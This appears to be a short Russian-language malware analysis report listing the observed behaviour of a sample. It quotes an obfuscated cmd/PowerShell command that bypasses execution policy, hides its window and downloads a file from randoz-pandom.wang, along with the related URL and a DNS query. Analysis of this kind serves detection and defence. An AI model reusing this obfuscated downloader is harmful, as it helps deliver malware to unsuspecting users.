Техническая информация
- http://randoz-pandom.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^e^R^she^ll^.e^xE -^ExEc^uTioNPO^Li^Cy^ bY^P^A^Ss^ ^-^NopRO^FI^le^ ^-WInDoW^St^Y^l^E ^H^IDd^eN (nE^w-oBJ^e^c^T^ ^sYStEm^.^net.^wEBC^LienT^).Dow^NLOADFILe('http://randoz-pandom...
- DNS ASK ra####-pandom.wang
- '<SYSTEM32>\cmd.exe' /c "poW^e^R^she^ll^.e^xE -^ExEc^uTioNPO^Li^Cy^ bY^P^A^Ss^ ^-^NopRO^FI^le^ ^-WInDoW^St^Y^l^E ^H^IDd^eN (nE^w-oBJ^e^c^T^ ^sYStEm^.^net.^wEBC^LienT^).Dow^NLOADFILe('http://randoz-pandom...' (со скрытым окном)